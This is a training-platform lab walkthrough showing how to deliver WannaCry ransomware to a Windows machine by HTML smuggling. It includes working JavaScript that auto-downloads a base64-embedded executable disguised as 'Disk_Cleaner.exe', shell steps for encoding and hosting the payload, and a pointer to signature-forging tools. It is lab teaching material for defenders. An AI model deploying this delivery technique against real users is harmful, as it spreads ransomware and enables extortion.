Lab Walkthrough - The WannaCry Ransomware
In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!
Introduction
In May 2017, a worldwide ransomware attack infamously known as WannaCry was set in motion. It targeted Microsoft Windows operating system by encrypting the data on the victim’s machine and seeking ransom in exchange for a promise to decrypt all the encrypted files and potentially undo the damage, but that’s far from the truth, as we discuss further! This ransomware made use of the EternalBlue, an exploit of Microsoft’s implementation of their SMB protocol, released by The Shadow Brokers hacker group in April 2017, to gain access to remote Windows machines in most cases. However, it also made use of DoublePulsar backdoor to spread itself from the infected machines.
Ransomware damages would cost the world $5 billion (USD) in 2017. The damages for 2018 were predicted to reach $8 billion; for 2019, the figure was $11.5 billion, and in 2021 it was $20 billion.
Similar types of attacks are still active. From 2017 until now, various ransomwares have been created under different names. Even after paying the ransom, there is no guarantee that your data will be decrypted again.
Who is a target for ransomware?
According to Josh Fruhlinger's article Ransomware Explained, "there are several different ways attackers choose the organizations they target with ransomware. Sometimes it’s a matter of opportunity: for instance, attackers might target universities because they tend to have smaller security teams and a disparate user base that does a lot of file sharing, making it easier to penetrate their defenses.
On the other hand, some organizations are tempting targets because they seem more likely to pay a ransom quickly. For instance, government agencies or medical facilities often need immediate access to their files. Law firms and other organizations with sensitive data may be willing to pay to keep news of a compromise quiet — and these organizations may be uniquely sensitive to leakware attacks."
Lab Environment
In our lab, we will learn how an attacker can use HTML smuggling to deliver the WannaCry executable to the target user. And how running this executable will encrypt the data/files on the target user’s machine, holding him on ransom to get that data back.
The user is going to get access to a Kali GUI instance and Windows Server 2019. The Kali machine will play the part of the attacker machine, whereas the Windows machine will be the target user’s machine.
Objective: Deliver the WannaCry executable to the Windows machine using HTML smuggling and execute it to observe the working of WannaCry ransomware!
Tools
The best tools for this lab are:
- Chrome Browser
- Apache Web Server
The wannacry.exe executable is located in: /root/Desktop/tools/ folder.
Solution
Step 1: Open the lab link to access the Kali GUI instance and target machine
Kali GUI
Target Machine
We can notice that the link to the chrome browser and Important Files folder are present on the Desktop.
Step 2: There is a ready-made HTML template available in /root/Desktop/tool/html-templates folder. We will copy these files to the Apache web server’s root folder.
HTLM template Source: https://templatemo.com/tm-519-beauty
Note: Remove all existing files from the Apache web server’s root folder before moving above mentioned files.
Commands:
rm -rf /var/www/html/*ls /var/www/html/
Step 3: The Wannacry Ransomware executable is present in /root/Desktop/tools/ folder. i.e wannacry.zip. We need to unzip the archive to access the executable
Commands:
cd /root/Desktop/toolsunzip wannacry.zipfile wanncry.exe
The WannaCry ransomware attack was the most notorious and highly controversial worldwide cyberattack that happened in May 2017. It targets the Windows operating system by encrypting data and demanding ransom payments in the form of cryptocurrency (Bitcoin).
For more information: https://en.wikipedia.org/wiki/WannaCry_ransomware_attack
We are going to use an HTML template and modify the `index.html` file to deliver the ransomware.
Step 4: Copy the HTML template files to the web server’s root folder.
Commands:
cp -rf /root/Desktop/tools/html-templates/* /var/www/html/ls /var/www/html/
Modify the index.html file and paste the below code under the HTML <body> tag.
<script> function base64ToArrayBuffer(base64) { var binary_string = window.atob(base64); var len = binary_string.length; var bytes = new Uint8Array( len ); for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); } return bytes.buffer; } var file ='<backdoor.exe Base64 Encoded Value>' var data = base64ToArrayBuffer(file); var blob = new Blob([data], {type: 'octet/stream'}); var fileName = 'Disk_Cleaner.exe'; var a = document.createElement('a'); document.body.appendChild(a); a.style = 'display: none'; var url = window.URL.createObjectURL(blob); a.href = url; a.download = fileName; a.click(); window.URL.revokeObjectURL(url);</script>
HTML smuggling is a well-known phishing campaign technique that uses HTML5 and Javascript to hide malicious executables or payloads. When a target user opens the HTML in their web browser, the browser decodes the malicious JS code and delivers the payload to the machine. According to Microsoft:
A highly evasive malware delivery technique that leverages legitimate HTML5 and JavaScript features, is increasingly used in email campaigns that deploy banking malware, remote access Trojans (RATs), and other payloads related to targeted attacks. Notably, this technique was observed in a spear-phishing campaign from the threat actor NOBELIUM in May. More recently, we have also seen this technique deliver the banking Trojan Mekotio, as well as AsyncRAT/NJRAT and Trickbot, malware that attackers utilize to gain control of affected devices and deliver ransomware payloads and other threats.
Step 5: The web server is all set. Now, we need to copy the base64-encoded of WannaCry executable (wanncry.exe) to the clipboard using the xsel utility.
Command:
base64 -w0 /root/Desktop/tools/wanncry.exe | xsel — clipboard
Step 6: Paste the base64 encoded value to replace `<backdoor.exe Base64 Encoded Value>` i.e `var file`
Note: Once we paste the value, it might take up to 1–2 minutes. Please wait patiently.
We have successfully fulfilled all the requirements to create an HTML smuggling webserver to distribute the wannacry.exe executable.
Step 7: Start the apache webserver
Command:
/etc/init.d/apache2 start
Step 8: We need the attacker machine’s IP address to access the malicious web server from the Windows host. Check the IP address with:
Command:
ip addr
The IP Address of the attacker (Kali Machine) is 10.10.15.2
Step 9: Now, switch the view to the Target Machine:
We notice an “Important Files” folder on the Desktop containing two files, i.e INE.jpg and office.pdf.
Step 10: Check both the files:
Opening INE.jpg file
Opening office.pdf file
We can access both files without any issue.
Step 11: Open the web browser on the Windows machine and browse to the portal hosted by the attacker.
IP Address: 10.10.15.2
We can notice that the file Disk_Cleaner.exe got downloaded automatically without any action from the user’s side. This confirmed that the JavaScript code for HTTP smuggling worked and delivered the wanncry.exe malicious executable to the target machine.
The chrome browser blocked the executable because it’s an unsigned executable. It is important to understand that it is not happening because the file is a malicious executable.
There are many tools to bypass this. One such popular tool is SigThief.
Reference: https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf
Step 12: Execute the Disk_Cleaner.exe executable.
The file is downloaded in the C:\Users\Administrator\Downloads\ folder.
Again, we have received another Windows “Open File — Security Warning” message. This is also because the executable doesn’t have a valid signature.
We will click on Run:
Once we click yes, wanncry.exe starts encrypting all the files on the system and changes all file extensions to .WNCRY.
Here is the full list of file extensions that were searched on the windows machine and encrypted by the WannaCry ransomware: https://gist.github.com/xpn/facb5692980c14df272b16a4ee6a29d5
As soon as the WannaCry ransomware encrypts all the files, it will show a random message demanding payment in cryptocurrency (Bitcoin).
The countdown is also shown to the user. If the user fails to pay the ransom, the attacker will delete the encryption key, and the data will remain encrypted.
A Bitcoin address is shown in the message. If we analyze that bitcoin address on BlockChair: (https://blockchair.com/bitcoin/address/13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94).
We can see that people are still making payments to that address.
BitCoin Address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
Try to check the files present in the Important Files folder, i.e, INE.jpg, and office.pdf. You won’t be able to open them this time as they are encrypted by ransomware.
How we can prevent such attacks?
We must keep the Windows operating system fully updated and never download or execute doubtful/untrusted executables. Also, some important actions could save you from this type of advanced attack:
- Take a backup of all your data
- Install Antivirus Software & Firewalls
- Keep All Systems And Software Updated
References
1. https://en.wikipedia.org/wiki/WannaCry_ransomware_attack
2. https://outflank.nl/blog/2018/08/14/html-smuggling-explained
3. https://www.upguard.com/blog/best-practices-to-prevent-ransomware-attacks
Try HTML Smuggling and executing the Wannacry Ransomware in this lab to understand it! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!